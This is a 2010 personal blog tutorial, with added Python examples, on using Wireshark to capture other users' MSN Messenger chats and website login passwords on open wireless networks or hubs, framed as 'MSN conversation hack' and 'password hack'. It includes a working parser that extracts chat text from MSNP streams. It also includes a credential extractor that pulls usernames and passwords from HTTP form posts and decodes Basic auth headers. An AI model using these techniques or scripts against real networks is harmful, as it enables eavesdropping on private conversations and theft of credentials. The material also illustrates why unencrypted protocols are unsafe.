Personal Web Space

Packet Sniffing with WireShark

6 June 2010, in Blog

Download and install Wireshark from http://www.wireshark.org/. Launch the application.

Go to Capture -> Options, select the interface of the network card you want to listen on, tick Capture packets in promiscuous mode and press Start. Be clear about what promiscuous mode does and does not give you: on a switched Ethernet network the switch only forwards your own traffic and broadcasts to your port, and on a Wi-Fi card promiscuous mode still only delivers frames addressed to you. Seeing other stations' frames needs monitor mode, and on a WPA-protected network those frames are encrypted with per-station keys anyway. The captures below therefore assume a position from which the other users' traffic actually reaches your card, such as an open (unencrypted) wireless network or a hub.

MSN conversation hack:

Wireshark starts listing the packets it captures. Among them, the Protocol column shows MSNMS, Wireshark's name for its MSN Messenger Service dissector. The underlying protocol is MSNP, which carries instant messages between the Messenger clients and the switchboard servers as plain text over TCP (port 1863), so nothing has to be decrypted.

Each row of the packet list is one captured frame: its number in the capture sequence, the time it was received, the source, the destination, the protocol and a short Info summary. The middle pane (packet details) decodes the protocol layers of the selected frame, and the bottom pane shows its raw bytes as a hex dump. The Filter field narrows the list: typing msnms and applying the filter leaves only packets of that protocol. Right-click one of them and select Follow TCP Stream. This option does exactly what it says: Wireshark reassembles the whole TCP connection that packet belongs to, both directions in order, and shows it as one conversation.

Select ASCII in the drop-down at the bottom right corner of the dialog box. The following is a cut-down version of what appears in the dialog box (the rows of dots stand for parts that were cut out).

ANS 88 stavros-msn@hotmail.com;{33C41B80-C54D-4FE6-8E31-5362BD8D23A6} 142171146.40169236 1084207748
IRO 88 1 2 lxiasstelios@msn.com;{1cd9c7bd-3e5e-4160-ae5e-9d8766cc6c96} S,TeLi0s 2788999228:136240
IRO 88 2 2 lxiasstelios@msn.com S,TeLi0s 2788999228:136240
ANS 88 OK
JOI stavros-msn@hotmail.com Stavros 2789003324:136240
MSG lxiasstelios@msn.com S,TeLi0s 148
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
X-MMS-IM-Format: FN=Microsoft%20Sans%20Serif; EF=; CO=ff0000; CS=0; PF=22
GoodmorningMSG lxiasstelios@msn.com S,TeLi0s 93
MIME-Version: 1.0
Content-Type: text/x-msmsgscontrol
TypingUser: lxiasstelios@msn.com
MSG lxiasstelios@msn.com S,TeLi0s 149
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
X-MMS-IM-Format: FN=Microsoft%20Sans%20Serif; EF=; CO=ff0000; CS=0; PF=22
how are you?MSG 89 U 96
MIME-Version: 1.0
Content-Type: text/x-msmsgscontrol
TypingUser: stavros-msn@hotmail.com
..................
 Goddmorning stelios. I am ok and you?MSG lxiasstelios@msn.com S,TeLi0s 93
..................
fine thanks. What did you think of the test we had yesterday?MSG 92 U 96
..................
i thought it wasnt very difficultMSG 95 U 96
..................
 i think i did very weelMSG 97 U 96
...................
sure, that sounds greatMSG lxiasstelios@msn.com S,TeLi0s 93
..................
ok meet there at 730?MSG 105 U 96
..................
ok see you thereMSG 107 U 96
MIME-Version: 1.0
Content-Type: text/x-msmsgscontrol
TypingUser: stavros-msn@hotmail.com
MSG 108 N 124
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
X-MMS-IM-Format: FN=Calibri; EF=B; CO=808000; CS=0; PF=22
byeMSG lxiasstelios@msn.com S,TeLi0s 93

As can be seen, the messages themselves are readable in the clear along with some protocol overhead. Every MSG command is followed by a MIME-style payload whose length in bytes is the last number on the MSG line (148, 93, 96 ...). When the payload's Content-Type is text/plain, the text after the blank line is the message ("Goodmorning", "how are you?" ...); the text/x-msmsgscontrol payloads are only typing notifications. Because the payload is read by byte count and has no terminator, the next command is glued directly onto the end of the text, which is why the dump reads "GoodmorningMSG ...". Server-to-client MSG lines name the sender (MSG lxiasstelios@msn.com S,TeLi0s 148), whereas the local client's own messages appear as MSG <transaction id> U <length> (MSG 89 U 96).
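The reading above can be automated instead of done by eye. The following is an added example, not code from the original post: it walks an MSNP stream command by command, uses the byte count on each MSG line to cut out the payload (which is exactly why the capture shows "GoodmorningMSG ..."), and keeps only the text/plain bodies. The sample stream is constructed to mirror the capture shown, with the payload lengths computed so it parses like real traffic.

```python
"""Extract the readable messages from a captured MSNP (MSN Messenger) TCP
stream, as shown by Follow TCP Stream.  Added example, not code from the
original post; the sample stream is constructed to mirror the capture above."""


def _payload(headers: bytes, body: str = "") -> bytes:
    """Build a MIME-style MSG payload: headers, blank line, body."""
    return headers + b"\r\n" + body.encode("utf-8")


def _msg(command_prefix: bytes, payload: bytes) -> bytes:
    """A MSG line ends with the payload length in bytes, then CRLF, then the
    payload itself with no terminator."""
    return command_prefix + b" " + str(len(payload)).encode() + b"\r\n" + payload


TEXT_HEADERS = (b"MIME-Version: 1.0\r\n"
                b"Content-Type: text/plain; charset=UTF-8\r\n"
                b"X-MMS-IM-Format: FN=Microsoft%20Sans%20Serif; EF=; CO=ff0000; CS=0; PF=22\r\n")
TYPING_HEADERS = (b"MIME-Version: 1.0\r\n"
                  b"Content-Type: text/x-msmsgscontrol\r\n"
                  b"TypingUser: lxiasstelios@msn.com\r\n")

# Constructed sample stream: one switchboard session as Follow TCP Stream
# would show it, both directions interleaved.
SAMPLE_STREAM = (
    b"ANS 88 stavros-msn@hotmail.com;{33C41B80-C54D-4FE6-8E31-5362BD8D23A6} 142171146.40169236 1084207748\r\n"
    b"IRO 88 1 1 lxiasstelios@msn.com S,TeLi0s 2788999228:136240\r\n"
    b"ANS 88 OK\r\n"
    + _msg(b"MSG lxiasstelios@msn.com S,TeLi0s", _payload(TEXT_HEADERS, "Goodmorning"))
    + _msg(b"MSG lxiasstelios@msn.com S,TeLi0s", _payload(TYPING_HEADERS))
    + _msg(b"MSG 89 U", _payload(TEXT_HEADERS, "Goodmorning stelios. I am ok and you?"))
    + _msg(b"MSG lxiasstelios@msn.com S,TeLi0s",
           _payload(TEXT_HEADERS, "fine thanks. What did you think of the test we had yesterday?"))
    + b"BYE lxiasstelios@msn.com\r\n"
)


def parse_msnp_stream(stream: bytes):
    """Return a list of (sender, text) for every MSG whose payload is
    text/plain.  Commands are CRLF-terminated; only MSG carries a payload."""
    messages = []
    pos = 0
    while pos < len(stream):
        end = stream.find(b"\r\n", pos)
        if end == -1:
            break  # truncated command line at the end of the capture
        fields = stream[pos:end].decode("utf-8", "replace").split(" ")
        pos = end + 2
        if fields[0] != "MSG" or len(fields) < 4:
            continue  # ANS/IRO/JOI/BYE etc. have no payload to read
        try:
            length = int(fields[-1])  # payload length in bytes
        except ValueError:
            continue
        payload = stream[pos:pos + length]
        if len(payload) < length:
            break  # capture cut off in the middle of a payload
        pos += length
        head, sep, body = payload.partition(b"\r\n\r\n")
        if not sep:
            continue
        headers = {}
        for line in head.split(b"\r\n"):
            name, _, value = line.decode("utf-8", "replace").partition(":")
            headers[name.strip().lower()] = value.strip()
        if not headers.get("content-type", "").startswith("text/plain"):
            continue  # typing notifications and other control payloads
        # Server -> client lines name the sender: "MSG <email> <nick> <len>".
        # The local client's own lines are "MSG <trid> <U|N|A> <len>".
        sender = fields[1] if "@" in fields[1] else "local user"
        messages.append((sender, body.decode("utf-8", "replace")))
    return messages


if __name__ == "__main__":
    for sender, text in parse_msnp_stream(SAMPLE_STREAM):
        print(f"{sender}: {text}")
```

To run it against a real capture, save the Follow TCP Stream dialog's content as raw bytes and pass that to parse_msnp_stream; the parser stops cleanly if the capture ends in the middle of a payload rather than guessing at the rest.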

Website login password hack:

Doing something similar to the above, we can also obtain the usernames and passwords of users logging in to a website. Instead of msnms, we now filter on http. The packets to look for show, in the Info column of the main window, a POST request to the file that handles the login form (e.g. login.php). Select one and Follow TCP Stream as before, making sure ASCII is selected at the bottom right corner; the form fields, password included, appear in the request body right after the headers. Websites that log in over HTTPS are a different story: the stream then consists of a TLS handshake followed by opaque encrypted records, so the password is not displayed in plaintext. Wireshark can decrypt such a session only if it is given the key material (the server's RSA private key for RSA key exchange, or a key log file written by the browser), which an eavesdropper does not have.

[Figure: plaintext packet, login to sharecontext.com over HTTP. The username and password are visible in the form body.]

[Figure: encrypted packet, login to facebook.com over HTTPS. Only TLS records, no readable credentials.]
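The same extraction can be scripted over the client half of the captured stream. The following is an added example, not code from the original post: it splits the stream into requests by honouring Content-Length (so a login POST and the next request on a keep-alive connection are not merged), then pulls the credential fields out of a form POST. It goes slightly beyond the post by also decoding an HTTP Basic Authorization header, which is exposed by plain HTTP in exactly the same way. The requests, host, field names and credentials are constructed and hypothetical.

```python
"""Pull login credentials out of the client half of a captured HTTP stream,
the way Follow TCP Stream exposes them when a site logs in over plain HTTP.
Added example, not code from the original post; the sample requests below
are constructed, and the host, field names and credentials are hypothetical."""

import base64
from urllib.parse import parse_qs

# Constructed sample: two requests on one keep-alive connection.  The first
# is a form login (the case in the post); the second carries HTTP Basic
# authentication, which is just as readable.
SAMPLE_STREAM = (
    b"POST /login.php HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 42\r\n"
    b"Connection: keep-alive\r\n"
    b"\r\n"
    b"username=alice&password=hunter2&remember=1"
    b"GET /admin/ HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"Authorization: Basic YWxpY2U6aHVudGVyMg==\r\n"
    b"\r\n"
)

# Form field names that commonly hold a login credential (assumed list).
CREDENTIAL_FIELDS = {"user", "username", "login", "email",
                     "pass", "password", "passwd", "pwd"}


def parse_http_requests(stream: bytes):
    """Split the stream into (request_line, headers, body) triples.  Headers
    end at the first blank line; the body runs for exactly Content-Length
    bytes, so pipelined requests are not merged into one."""
    requests = []
    pos = 0
    while pos < len(stream):
        head_end = stream.find(b"\r\n\r\n", pos)
        if head_end == -1:
            break  # incomplete request at the end of the capture
        head = stream[pos:head_end].decode("iso-8859-1")
        pos = head_end + 4
        request_line, *header_lines = head.split("\r\n")
        headers = {}
        for line in header_lines:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        try:
            length = int(headers.get("content-length", "0"))
        except ValueError:
            break
        body = stream[pos:pos + length]
        if len(body) < length:
            break  # body cut off mid-capture
        pos += length
        requests.append((request_line, headers, body))
    return requests


def extract_credentials(stream: bytes):
    """Return one dict per request that exposed credentials, keyed by the
    form field name (or basic_user / basic_password for Basic auth)."""
    found = []
    for request_line, headers, body in parse_http_requests(stream):
        method = request_line.split(" ", 1)[0]
        creds = {}
        if (method == "POST" and
                headers.get("content-type", "").startswith("application/x-www-form-urlencoded")):
            for field, values in parse_qs(body.decode("utf-8", "replace")).items():
                if field.lower() in CREDENTIAL_FIELDS:
                    creds[field] = values[0]
        auth = headers.get("authorization", "")
        if auth.lower().startswith("basic "):
            try:
                decoded = base64.b64decode(auth[6:].strip()).decode("utf-8", "replace")
                user, _, password = decoded.partition(":")
                creds["basic_user"], creds["basic_password"] = user, password
            except ValueError:
                pass  # malformed base64, nothing to recover
        if creds:
            found.append({"request": request_line, **creds})
    return found


if __name__ == "__main__":
    for entry in extract_credentials(SAMPLE_STREAM):
        print(entry)
```

In Wireshark itself the display filter http.request.method == "POST" narrows the list to the requests worth following. Fed the client half of an HTTPS connection, the same code finds nothing: there is no request line or Content-Length to parse, only TLS records.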

